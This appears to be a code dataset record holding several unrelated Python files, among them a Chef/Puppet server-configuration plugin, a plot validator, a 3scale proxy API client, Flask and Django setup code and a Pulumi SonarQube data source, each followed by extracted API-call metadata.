"storagePublicKey":
("", False, plugin_utils.base64type_convertor, None),
"storagePrivateKey":
("", False, plugin_utils.base64type_convertor, None),
"environmentId":
("", False, str, None),
"personalityFiles":
("", False, list, None),
"configClientName":
("", False, str, None),
"configCert":
("", False, plugin_utils.base64type_convertor, None),
"configKey":
("", False, plugin_utils.base64type_convertor, None),
"runListIds":
("", False, list, None),
"parameterList":
("", False, plugin_utils.base64type_convertor, None),
}
def __init__(self, conf, job_id, items_map, name, arguments):
super(ConfigureServer, self).__init__(
conf, job_id, items_map, name, arguments)
if not self.args.runAsUser:
self.args.runAsUser = self.conf.system_user
def configure_server_with_chef(self):
chef_dir = self.conf.get_temp_file("chefconf", isdir=True)
run_list_file_name = os.path.join(chef_dir, "runList.cfg")
token_file_path = self.conf.get_temp_file("token.pem")
try:
if self.args.encryptedAuthSecret:
token = self.args.encryptedAuthSecret
else:
token = "NULL"
authId = self.args.authId
if authId is None:
authId = "NULL"
endpoint = self.args.endpoint
if endpoint is None:
endpoint = "NULL"
environmentId = self.args.environmentId
if environmentId is None:
environmentId = "NULL"
chef_json = {"run_list": self.args.runListIds}
with open(run_list_file_name, "w") as fptr:
fptr.write(json.dumps(chef_json))
with open(token_file_path, "w") as fptr:
fptr.write(token)
fptr.write(os.linesep)
exe = self.conf.get_script_location(
"runConfigurationManagement-CHEF")
cmd_list = [exe,
self.args.runAsUser,
self.args.configClientName,
token_file_path,
run_list_file_name,
authId,
endpoint,
environmentId,
self.conf.configuration_management_chef_client_version]
return plugin_utils.run_command(self.conf, cmd_list)
finally:
plugin_utils.safe_delete(run_list_file_name)
plugin_utils.safe_delete(token_file_path)
def _edit_puppet_conf(self, template_path, new_location, endpoint):
parser = configparser.SafeConfigParser()
parser.read(template_path)
if not parser.has_section("agent"):
parser.add_section("agent")
parser.set("agent", "certname", self.args.configClientName)
parser.set("agent", "server", endpoint)
with open(new_location, "w") as fptr:
parser.write(fptr)
def configure_server_with_puppet(self):
if self.args.endpoint is None:
raise exceptions.AgentOptionValueNotSetException("endpoint")
# XXX it will only work with the default port. There is no way for
# the user to configure anything else in the console
endpoint = urllib.parse.urlparse(self.args.endpoint).hostname
puppet_extras_base_path = os.path.join(self.conf.extra_base_path,
"puppetconf")
puppet_extras_bin = os.path.join(self.conf.extra_base_path,
"bin/puppet")
try:
utils.install_extras(
self.conf, package=self.conf.extra_package_name)
except exceptions.AgentExtrasNotInstalledException as ex:
_g_logger.exception("An error occurred trying to install puppet. "
"Exception message is %s" % str(ex))
raise
template_puppet_conf_path = os.path.join(puppet_extras_base_path,
"puppet.conf.template")
if not os.path.exists(template_puppet_conf_path):
raise exceptions.AgentExtrasNotInstalledException(
"The puppet.conf template did not install properly.")
if not os.path.exists(puppet_extras_bin):
raise exceptions.AgentExtrasNotInstalledException(
"The puppet binary did not install properly.")
puppet_conf_path = self.conf.get_temp_file("puppet.conf")
self._edit_puppet_conf(template_puppet_conf_path,
puppet_conf_path,
endpoint)
cert_file_path = self.conf.get_temp_file("cert.pem")
key_file_path = self.conf.get_temp_file("key.pem")
try:
with open(cert_file_path, "w") as fptr:
fptr.write(self.args.configCert)
with open(key_file_path, "w") as fptr:
fptr.write(self.args.configKey)
exe = self.conf.get_script_location(
"runConfigurationManagement-PUPPET")
cmd = [exe,
endpoint,
cert_file_path,
key_file_path,
self.args.configClientName,
self.conf.extra_base_path,
puppet_conf_path]
return plugin_utils.run_command(self.conf, cmd)
finally:
plugin_utils.safe_delete(cert_file_path)
plugin_utils.safe_delete(key_file_path)
plugin_utils.safe_delete(puppet_conf_path)
def run(self):
_g_logger.info("Running configuration management of type " +
self.args.configType)
if self.args.configType.upper() == "CHEF":
(stdout, stderr, rc) = self.configure_server_with_chef()
elif self.args.configType.upper() == "PUPPET":
(stdout, stderr, rc) = self.configure_server_with_puppet()
else:
raise plugin_exceptions.AgentPluginParameterBadValueException(
"configType", "CHEF or PUPPET")
if stderr:
dcm_logger.log_to_dcm_console_configuration_management_error(
stderr=stderr)
if stdout:
dcm_logger.log_to_dcm_console_configuration_management_output(
stdout=stdout)
if rc != 0:
return plugin_base.PluginReply(rc, message=stderr)
else:
return plugin_base.PluginReply(
rc, reply_type="string", reply_object=stdout)
def load_plugin(conf, job_id, items_map, name, arguments):
return ConfigureServer(conf, job_id, items_map, name, arguments)
| [
"logging.getLogger",
"os.path.exists",
"dcm.agent.logger.log_to_dcm_console_configuration_management_error",
"dcm.agent.plugins.api.exceptions.AgentPluginParameterBadValueException",
"dcm.agent.logger.log_to_dcm_console_configuration_management_output",
"dcm.agent.plugins.api.base.PluginReply",
"json.du... | [((948, 975), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (965, 975), False, 'import logging\n'), ((3059, 3096), 'os.path.join', 'os.path.join', (['chef_dir', '"""runList.cfg"""'], {}), "(chef_dir, 'runList.cfg')\n", (3071, 3096), False, 'import os\n'), ((4736, 4767), 'configparser.SafeConfigParser', 'configparser.SafeConfigParser', ([], {}), '()\n', (4765, 4767), False, 'import configparser\n'), ((5481, 5534), 'os.path.join', 'os.path.join', (['self.conf.extra_base_path', '"""puppetconf"""'], {}), "(self.conf.extra_base_path, 'puppetconf')\n", (5493, 5534), False, 'import os\n'), ((5610, 5663), 'os.path.join', 'os.path.join', (['self.conf.extra_base_path', '"""bin/puppet"""'], {}), "(self.conf.extra_base_path, 'bin/puppet')\n", (5622, 5663), False, 'import os\n'), ((6088, 6149), 'os.path.join', 'os.path.join', (['puppet_extras_base_path', '"""puppet.conf.template"""'], {}), "(puppet_extras_base_path, 'puppet.conf.template')\n", (6100, 6149), False, 'import os\n'), ((4472, 4517), 'dcm.agent.plugins.api.utils.run_command', 'plugin_utils.run_command', (['self.conf', 'cmd_list'], {}), '(self.conf, cmd_list)\n', (4496, 4517), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((4547, 4591), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['run_list_file_name'], {}), '(run_list_file_name)\n', (4571, 4591), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((4604, 4645), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['token_file_path'], {}), '(token_file_path)\n', (4628, 4645), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((5183, 5237), 'dcm.agent.exceptions.AgentOptionValueNotSetException', 'exceptions.AgentOptionValueNotSetException', (['"""endpoint"""'], {}), "('endpoint')\n", (5225, 5237), True, 'import dcm.agent.exceptions as exceptions\n'), ((5731, 5800), 'dcm.agent.utils.install_extras', 'utils.install_extras', (['self.conf'], {'package': 'self.conf.extra_package_name'}), '(self.conf, package=self.conf.extra_package_name)\n', (5751, 5800), True, 'import dcm.agent.utils as utils\n'), ((6214, 6255), 'os.path.exists', 'os.path.exists', (['template_puppet_conf_path'], {}), '(template_puppet_conf_path)\n', (6228, 6255), False, 'import os\n'), ((6275, 6377), 'dcm.agent.exceptions.AgentExtrasNotInstalledException', 'exceptions.AgentExtrasNotInstalledException', (['"""The puppet.conf template did not install properly."""'], {}), "(\n 'The puppet.conf template did not install properly.')\n", (6318, 6377), True, 'import dcm.agent.exceptions as exceptions\n'), ((6405, 6438), 'os.path.exists', 'os.path.exists', (['puppet_extras_bin'], {}), '(puppet_extras_bin)\n', (6419, 6438), False, 'import os\n'), ((6458, 6553), 'dcm.agent.exceptions.AgentExtrasNotInstalledException', 'exceptions.AgentExtrasNotInstalledException', (['"""The puppet binary did not install properly."""'], {}), "(\n 'The puppet binary did not install properly.')\n", (6501, 6553), True, 'import dcm.agent.exceptions as exceptions\n'), ((7489, 7529), 'dcm.agent.plugins.api.utils.run_command', 'plugin_utils.run_command', (['self.conf', 'cmd'], {}), '(self.conf, cmd)\n', (7513, 7529), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((7559, 7599), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['cert_file_path'], {}), '(cert_file_path)\n', (7583, 7599), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((7612, 7651), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['key_file_path'], {}), '(key_file_path)\n', (7636, 7651), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((7664, 7706), 'dcm.agent.plugins.api.utils.safe_delete', 'plugin_utils.safe_delete', (['puppet_conf_path'], {}), '(puppet_conf_path)\n', (7688, 7706), True, 'import dcm.agent.plugins.api.utils as plugin_utils\n'), ((8257, 8332), 'dcm.agent.logger.log_to_dcm_console_configuration_management_error', 'dcm_logger.log_to_dcm_console_configuration_management_error', ([], {'stderr': 'stderr'}), '(stderr=stderr)\n', (8317, 8332), True, 'import dcm.agent.logger as dcm_logger\n'), ((8381, 8457), 'dcm.agent.logger.log_to_dcm_console_configuration_management_output', 'dcm_logger.log_to_dcm_console_configuration_management_output', ([], {'stdout': 'stdout'}), '(stdout=stdout)\n', (8442, 8457), True, 'import dcm.agent.logger as dcm_logger\n'), ((8515, 8558), 'dcm.agent.plugins.api.base.PluginReply', 'plugin_base.PluginReply', (['rc'], {'message': 'stderr'}), '(rc, message=stderr)\n', (8538, 8558), True, 'import dcm.agent.plugins.api.base as plugin_base\n'), ((8592, 8661), 'dcm.agent.plugins.api.base.PluginReply', 'plugin_base.PluginReply', (['rc'], {'reply_type': '"""string"""', 'reply_object': 'stdout'}), "(rc, reply_type='string', reply_object=stdout)\n", (8615, 8661), True, 'import dcm.agent.plugins.api.base as plugin_base\n'), ((8120, 8211), 'dcm.agent.plugins.api.exceptions.AgentPluginParameterBadValueException', 'plugin_exceptions.AgentPluginParameterBadValueException', (['"""configType"""', '"""CHEF or PUPPET"""'], {}), "('configType',\n 'CHEF or PUPPET')\n", (8175, 8211), True, 'import dcm.agent.plugins.api.exceptions as plugin_exceptions\n'), ((3806, 3827), 'json.dumps', 'json.dumps', (['chef_json'], {}), '(chef_json)\n', (3816, 3827), False, 'import json\n')] |
from toolz import get
PLOT_VALIDATORS = [
(
{"line", "scatter", "bar"},
lambda x: ("x" not in x) or ("y" not in x),
"XY plot does not have X and Y.",
),
(
{"histogram"},
lambda x: ("step" in x) and ("bins" in x),
"Histogram cannot have STEP and BINS.",
),
(
{"line", "scatter", "bar"},
lambda x: ("agg" in x["x"]) and ("agg" in x["y"]),
"XY plot cannot have an aggregation on X and Y.",
),
(
{"histogram", "pie"},
lambda x: ("agg" in get("x", x, {}))
or ("agg" in get("y", x, {}))
or ("agg" in get("axis", x, {})),
"Histograms and pie charts cannot have aggregations.",
),
(
{"histogram", "pie"},
lambda x: ("temporal" in get("x", x, {}))
or ("temporal" in get("y", x, {}))
or ("temporal" in get("axis", x, {})),
"Histograms and pie charts cannot have temporal axes.",
),
(
{"histogram"},
lambda x: ("x" in x) and ("y" in x),
"Histograms can have X or Y, not both.",
),
(
{"histogram"},
lambda x: ("x" not in x) and ("y" not in x),
"Histograms must have an X or Y.",
),
({"pie"}, lambda x: "axis" not in x, "Pie charts must have an axis."),
(
{"line", "bar"}, # SORT is a no-op for scatter.
lambda x: ("sort" in x["x"]) and ("sort" in x["y"]),
"Cannot sort by two axes.",
),
(
{"pie"},
lambda x: (get("hole", x, 0.0) < 0) or (get("hole", x, 0.0) > 1),
"HOLE must be between zero and one.",
),
(
{"histogram"},
lambda x: get("step", x, 1) <= 0,
"STEP must be greater than zero.",
),
(
{"histogram"},
lambda x: get("bins", x, 1) <= 0,
"BINS must be greater than zero.",
),
(
{"histogram", "pie"},
lambda x: "color_by" in x,
"Histograms and pie charts cannot have COLOR BY.",
),
({"pie"}, lambda x: "split_by" in x, "Pie charts cannot have SPLIT BY."),
(
{"line", "scatter", "bar"},
lambda x: ("split_by" in x) and ("color_by" in x),
"Cannot have COLOR BY and SPLIT BY on same plot.",
),
(
{"line", "scatter", "bar"},
lambda x: (
# If we don't include this it can throw exceptions for other
# validators.
("x" in x)
and ("y" in x)
)
and (("agg" in x["x"]) or ("agg" in x["y"]))
and (("color_by" in x) and ("agg" not in x["color_by"])),
"If there's an aggregation on X or Y, COLOR BY must also aggregate.",
),
]
def validate_plot(svl_plot):
""" Validates the SVL plot.
Parameters
----------
svl_plot : dict
The SVL plot specifier.
Returns
-------
Tuple[bool, str]
A boolean indicating whether the plot is valid and a message
indicating that the plot is either valid or which validations it
failed.
"""
ok = True
failure_messages = []
for plots, validator, message in PLOT_VALIDATORS:
if (svl_plot["type"] in plots) and validator(svl_plot):
ok = False
failure_messages.append(message)
return ok, "\n".join(failure_messages)
| [
"toolz.get"
] | [((1666, 1683), 'toolz.get', 'get', (['"""step"""', 'x', '(1)'], {}), "('step', x, 1)\n", (1669, 1683), False, 'from toolz import get\n'), ((1787, 1804), 'toolz.get', 'get', (['"""bins"""', 'x', '(1)'], {}), "('bins', x, 1)\n", (1790, 1804), False, 'from toolz import get\n'), ((551, 566), 'toolz.get', 'get', (['"""x"""', 'x', '{}'], {}), "('x', x, {})\n", (554, 566), False, 'from toolz import get\n'), ((589, 604), 'toolz.get', 'get', (['"""y"""', 'x', '{}'], {}), "('y', x, {})\n", (592, 604), False, 'from toolz import get\n'), ((627, 645), 'toolz.get', 'get', (['"""axis"""', 'x', '{}'], {}), "('axis', x, {})\n", (630, 645), False, 'from toolz import get\n'), ((787, 802), 'toolz.get', 'get', (['"""x"""', 'x', '{}'], {}), "('x', x, {})\n", (790, 802), False, 'from toolz import get\n'), ((830, 845), 'toolz.get', 'get', (['"""y"""', 'x', '{}'], {}), "('y', x, {})\n", (833, 845), False, 'from toolz import get\n'), ((873, 891), 'toolz.get', 'get', (['"""axis"""', 'x', '{}'], {}), "('axis', x, {})\n", (876, 891), False, 'from toolz import get\n'), ((1511, 1530), 'toolz.get', 'get', (['"""hole"""', 'x', '(0.0)'], {}), "('hole', x, 0.0)\n", (1514, 1530), False, 'from toolz import get\n'), ((1540, 1559), 'toolz.get', 'get', (['"""hole"""', 'x', '(0.0)'], {}), "('hole', x, 0.0)\n", (1543, 1559), False, 'from toolz import get\n')] |
from hoyolab import main
from os import environ
from os.path import exists
import atoma
def init_environ(d):
environ['HOYOLAB_JSON_PATH'] = '{}/hoyolab.json'.format(d)
environ['HOYOLAB_ATOM_PATH'] = '{}/hoyolab.xml'.format(d)
environ['HOYOLAB_JSON_URL'] = 'hoyolab.json'
environ['HOYOLAB_ATOM_URL'] = 'hoyolab.xml'
environ['HOYOLAB_ENTRIES'] = '1'
def test_feeds(tmpdir):
init_environ(tmpdir)
json_path = environ['HOYOLAB_JSON_PATH']
atom_path = environ['HOYOLAB_ATOM_PATH']
num_entries = int(environ['HOYOLAB_ENTRIES']) * 3
main()
assert exists(json_path)
assert exists(atom_path)
json_feed = atoma.parse_json_feed_file(json_path)
assert len(json_feed.items) == num_entries
atom_feed = atoma.parse_atom_file(atom_path)
assert len(atom_feed.entries) == num_entries
| [
"os.path.exists",
"atoma.parse_json_feed_file",
"hoyolab.main",
"atoma.parse_atom_file"
] | [((571, 577), 'hoyolab.main', 'main', ([], {}), '()\n', (575, 577), False, 'from hoyolab import main\n'), ((590, 607), 'os.path.exists', 'exists', (['json_path'], {}), '(json_path)\n', (596, 607), False, 'from os.path import exists\n'), ((619, 636), 'os.path.exists', 'exists', (['atom_path'], {}), '(atom_path)\n', (625, 636), False, 'from os.path import exists\n'), ((654, 691), 'atoma.parse_json_feed_file', 'atoma.parse_json_feed_file', (['json_path'], {}), '(json_path)\n', (680, 691), False, 'import atoma\n'), ((757, 789), 'atoma.parse_atom_file', 'atoma.parse_atom_file', (['atom_path'], {}), '(atom_path)\n', (778, 789), False, 'import atoma\n')] |
from django.urls import path
from . import views as sg
urlpatterns = [
path('artist', sg.artist),
path('genre', sg.genre),
path('release', sg.release),
path('track', sg.track),
path('', sg.sausage_grinder_index),
]
| [
"django.urls.path"
] | [((77, 102), 'django.urls.path', 'path', (['"""artist"""', 'sg.artist'], {}), "('artist', sg.artist)\n", (81, 102), False, 'from django.urls import path\n'), ((108, 131), 'django.urls.path', 'path', (['"""genre"""', 'sg.genre'], {}), "('genre', sg.genre)\n", (112, 131), False, 'from django.urls import path\n'), ((137, 164), 'django.urls.path', 'path', (['"""release"""', 'sg.release'], {}), "('release', sg.release)\n", (141, 164), False, 'from django.urls import path\n'), ((170, 193), 'django.urls.path', 'path', (['"""track"""', 'sg.track'], {}), "('track', sg.track)\n", (174, 193), False, 'from django.urls import path\n'), ((199, 233), 'django.urls.path', 'path', (['""""""', 'sg.sausage_grinder_index'], {}), "('', sg.sausage_grinder_index)\n", (203, 233), False, 'from django.urls import path\n')] |
from FitnessPlot import FitnessPlot
'''
for n in range(1,6):
plot = FitnessPlot(folder_prefix='data_top{}'.format(n))
plot.plot_all_workers()
plot.plot_workers_as_average()
'''
plot = FitnessPlot(folder_prefix='data_top1', num_workers=16)
worker_dict = plot.create_worker_dict()
#plot.plot_all_workers()
#plot.plot_workers_as_average()
#print(worker_dict)
for key,value in worker_dict.items():
dict_len = len(value)
#if dict_len < 100:
# print(key)
# print(dict_len)
print(key)
print(value[len(value)-1])
| [
"FitnessPlot.FitnessPlot"
] | [((199, 253), 'FitnessPlot.FitnessPlot', 'FitnessPlot', ([], {'folder_prefix': '"""data_top1"""', 'num_workers': '(16)'}), "(folder_prefix='data_top1', num_workers=16)\n", (210, 253), False, 'from FitnessPlot import FitnessPlot\n')] |
import logging
def setup_logger():
formatter = logging.Formatter('%(asctime)s.%(msecs)03d %(levelname)s %(message)s',
'%Y-%m-%d %H:%M:%S')
logging.basicConfig(level=logging.INFO,
format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
root = logging.getLogger()
hdlr = root.handlers[0]
hdlr.setFormatter(formatter)
| [
"logging.basicConfig",
"logging.Formatter",
"logging.getLogger"
] | [((54, 149), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s.%(msecs)03d %(levelname)s %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s.%(msecs)03d %(levelname)s %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (71, 149), False, 'import logging\n'), ((184, 324), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(level=logging.INFO, format=\n '%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (203, 324), False, 'import logging\n'), ((374, 393), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (391, 393), False, 'import logging\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ThreeScale Proxies Rule interface for APIs."""
from .base import ThreeScale
import logging
import requests
import xmltodict
import json
logger = logging.getLogger(__name__)
class Proxies(ThreeScale):
"""ThreeScale Proxies create, update."""
response = None
def __init__(self):
"""Initialize object."""
super().__init__()
self.service_id = None
def update(self,
tracker,
service_id,
api_backend,
credentials_location='query',
auth_app_key='user_key',
endpoint=None,
auth_app_id=None,
auth_user_key=None,
error_auth_failed=None,
error_status_auth_failed=None,
error_headers_auth_failed=None,
error_auth_missing=None,
error_status_auth_missing=None,
error_headers_auth_missing=None,
error_no_match=None,
error_status_no_match=None,
error_headers_no_match=None,
oidc_issuer_endpoint=None,
sandbox_endpoint=None
):
"""Update policy."""
self.service_id = service_id
request_body = {
'access_token': self._access_token,
"api_backend": api_backend,
"credentials_location": credentials_location,
"auth_app_key": auth_app_key,
"endpoint": endpoint,
"auth_app_id": auth_app_id,
"auth_user_key": auth_user_key,
"error_auth_failed": error_auth_failed,
"error_status_auth_failed": error_status_auth_failed,
"error_headers_auth_failed": error_headers_auth_failed,
"error_auth_missing": error_auth_missing,
"error_status_auth_missing": error_status_auth_missing,
"error_headers_auth_missing": error_headers_auth_missing,
"error_no_match": error_no_match,
"error_status_no_match": error_status_no_match,
"error_headers_no_match": error_headers_no_match,
"oidc_issuer_endpoint": oidc_issuer_endpoint,
"sandbox_endpoint": sandbox_endpoint,
}
request_body = {k: v for k, v in request_body.items() if v}
_url = self._build_url(
self._endpoints.proxy_update.format(service_id=service_id))
_resp = requests.patch(_url, data=request_body)
logger.info("[PATCH] {} with STATUS CODE: {}".format(
_url, _resp.status_code))
if _resp.ok:
self.response = xmltodict.parse(
_resp.content, dict_constructor=dict)
logger.info(
"Successfully Updated Proxy: {}".format(api_backend))
return self.response
else:
logger.error("Update Proxy FAILED {} with STATUS CODE {}".format(
_url, _resp.status_code))
logger.error("FAILED RESPONSE: {}".format(_resp.content))
tracker._rollback()
def _get_highest_version(self, service_id=None, environment='sandbox'):
service_id = service_id or self.service_id
params = {
'access_token': self._access_token,
}
_url = self._build_url(
self._endpoints.proxy_config_list.format(service_id=service_id,
environment=environment))
_resp = requests.get(_url, params=params)
logger.info("[GET] {} with STATUS CODE: {}".format(
_url, _resp.status_code))
if _resp.ok:
output = _resp.json()
if output:
higest_version = max([conf.get('proxy_config', {}).get('version', 2)
for conf in output.get('proxy_configs', {})])
logger.info("HIGHEST Version: {}".format(higest_version))
return higest_version
else:
logger.error("Unable to fetch the latest version.")
return 2
def policy_update(self, tracker, headers, service_id=None):
"""Update the Proxy Policy Configuration."""
policies_config = [{
"name": "headers",
"configuration": {
"response": [],
"request":headers},
"version": "builtin",
"enabled": True
}]
service_id = service_id or self.service_id
request_body = {
'access_token': self._access_token,
'service_id': service_id,
'policies_config': json.dumps(policies_config)
}
_url = self._build_url(
self._endpoints.proxy_policy_update.format(service_id=service_id))
_resp = requests.put(_url, data=request_body)
logger.info("[PUT] {} with STATUS CODE: {}".format(
_url, _resp.status_code))
if _resp.ok:
self.response = _resp
logger.info("Successfully Updated Proxy Policy Config")
return self.response
else:
logger.error("Update Proxy Policy Config FAILED {} with STATUS CODE {}".format(
_url, _resp.status_code))
logger.error("FAILED RESPONSE: {}".format(_resp.content))
tracker._rollback()
def proxy_promote(self, tracker,
service_id=None,
environment='sandbox',
to='production'):
"""Promote Proxy to another environment."""
service_id = service_id or self.service_id
version = self._get_highest_version()
request_body = {
'access_token': self._access_token,
'to': to
}
_url = self._build_url(
self._endpoints.proxy_config_promote.format(service_id=service_id,
environment=environment,
version=version))
_resp = requests.post(_url, data=request_body)
logger.info("[POST] {} with STATUS CODE: {}".format(
_url, _resp.status_code))
if _resp.ok:
self.response = _resp
logger.info("Successfully Promoted Proxy to {}".format(to))
return self.response
else:
logger.error("Promote Proxy FAILED {} with STATUS CODE {}".format(
_url, _resp.status_code))
logger.error("FAILED RESPONSE: {}".format(_resp.content))
tracker._rollback()
def find(self):
"""Find the Mapping."""
raise NotImplementedError("Method find Not Implemented.")
def __repr__(self):
"""Representation of class."""
api_backend = self.response.get('proxy', {}).get('api_backend')
return "Class Mappings(id={})".format(api_backend)
| [
"logging.getLogger",
"requests.post",
"xmltodict.parse",
"requests.patch",
"json.dumps",
"requests.get",
"requests.put"
] | [((198, 225), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (215, 225), False, 'import logging\n'), ((2457, 2496), 'requests.patch', 'requests.patch', (['_url'], {'data': 'request_body'}), '(_url, data=request_body)\n', (2471, 2496), False, 'import requests\n'), ((3491, 3524), 'requests.get', 'requests.get', (['_url'], {'params': 'params'}), '(_url, params=params)\n', (3503, 3524), False, 'import requests\n'), ((4829, 4866), 'requests.put', 'requests.put', (['_url'], {'data': 'request_body'}), '(_url, data=request_body)\n', (4841, 4866), False, 'import requests\n'), ((6070, 6108), 'requests.post', 'requests.post', (['_url'], {'data': 'request_body'}), '(_url, data=request_body)\n', (6083, 6108), False, 'import requests\n'), ((2648, 2701), 'xmltodict.parse', 'xmltodict.parse', (['_resp.content'], {'dict_constructor': 'dict'}), '(_resp.content, dict_constructor=dict)\n', (2663, 2701), False, 'import xmltodict\n'), ((4664, 4691), 'json.dumps', 'json.dumps', (['policies_config'], {}), '(policies_config)\n', (4674, 4691), False, 'import json\n')] |
# Created with tutorials:
# https://www.digitalocean.com/community/tutorials/how-to-structure-large-flask-applications
# http://flask.pocoo.org/docs/0.12/tutorial
from flask import Flask, g, render_template
from flask_sqlalchemy import SQLAlchemy
import sqlite3
# Define WSGI application object.
app = Flask(__name__)
# Configurations
app.config.from_object('config')
app.config.from_envvar('CONFIG', silent=True)
# Define database object.
db = SQLAlchemy(app)
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
# Import a module / component using its blueprint handler variable (mod_auth)
from app.api.entries.controllers import mod as entries_module
from app.site.controllers import mod as site_module
# Register blueprint(s)
app.register_blueprint(entries_module)
app.register_blueprint(site_module)
# app.register_blueprint(xyz_module)
# ..
# Build the database:
# This will create the database file using SQLAlchemy
db.create_all()
| [
"flask.render_template",
"flask_sqlalchemy.SQLAlchemy",
"flask.Flask"
] | [((306, 321), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (311, 321), False, 'from flask import Flask, g, render_template\n'), ((451, 466), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (461, 466), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((524, 551), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (539, 551), False, 'from flask import Flask, g, render_template\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'GetUsersResult',
'AwaitableGetUsersResult',
'get_users',
'get_users_output',
]
@pulumi.output_type
class GetUsersResult:
"""
A collection of values returned by getUsers.
"""
def __init__(__self__, email=None, id=None, is_local=None, login_name=None, name=None):
if email and not isinstance(email, str):
raise TypeError("Expected argument 'email' to be a str")
pulumi.set(__self__, "email", email)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if is_local and not isinstance(is_local, bool):
raise TypeError("Expected argument 'is_local' to be a bool")
pulumi.set(__self__, "is_local", is_local)
if login_name and not isinstance(login_name, str):
raise TypeError("Expected argument 'login_name' to be a str")
pulumi.set(__self__, "login_name", login_name)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def email(self) -> str:
return pulumi.get(self, "email")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isLocal")
def is_local(self) -> bool:
return pulumi.get(self, "is_local")
@property
@pulumi.getter(name="loginName")
def login_name(self) -> str:
return pulumi.get(self, "login_name")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
class AwaitableGetUsersResult(GetUsersResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetUsersResult(
email=self.email,
id=self.id,
is_local=self.is_local,
login_name=self.login_name,
name=self.name)
def get_users(login_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetUsersResult:
"""
Use this data source to access information about an existing resource.
"""
__args__ = dict()
__args__['loginName'] = login_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('sonarqube:index/getUsers:getUsers', __args__, opts=opts, typ=GetUsersResult).value
return AwaitableGetUsersResult(
email=__ret__.email,
id=__ret__.id,
is_local=__ret__.is_local,
login_name=__ret__.login_name,
name=__ret__.name)
@_utilities.lift_output_func(get_users)
def get_users_output(login_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetUsersResult]:
"""
Use this data source to access information about an existing resource.
"""
...
| [
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] | [((1788, 1817), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""isLocal"""'}), "(name='isLocal')\n", (1801, 1817), False, 'import pulumi\n'), ((1914, 1945), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""loginName"""'}), "(name='loginName')\n", (1927, 1945), False, 'import pulumi\n'), ((766, 802), 'pulumi.set', 'pulumi.set', (['__self__', '"""email"""', 'email'], {}), "(__self__, 'email', email)\n", (776, 802), False, 'import pulumi\n'), ((920, 950), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (930, 950), False, 'import pulumi\n'), ((1088, 1130), 'pulumi.set', 'pulumi.set', (['__self__', '"""is_local"""', 'is_local'], {}), "(__self__, 'is_local', is_local)\n", (1098, 1130), False, 'import pulumi\n'), ((1272, 1318), 'pulumi.set', 'pulumi.set', (['__self__', '"""login_name"""', 'login_name'], {}), "(__self__, 'login_name', login_name)\n", (1282, 1318), False, 'import pulumi\n'), ((1442, 1476), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (1452, 1476), False, 'import pulumi\n'), ((1554, 1579), 'pulumi.get', 'pulumi.get', (['self', '"""email"""'], {}), "(self, 'email')\n", (1564, 1579), False, 'import pulumi\n'), ((1745, 1767), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (1755, 1767), False, 'import pulumi\n'), ((1865, 1893), 'pulumi.get', 'pulumi.get', (['self', '"""is_local"""'], {}), "(self, 'is_local')\n", (1875, 1893), False, 'import pulumi\n'), ((1994, 2024), 'pulumi.get', 'pulumi.get', (['self', '"""login_name"""'], {}), 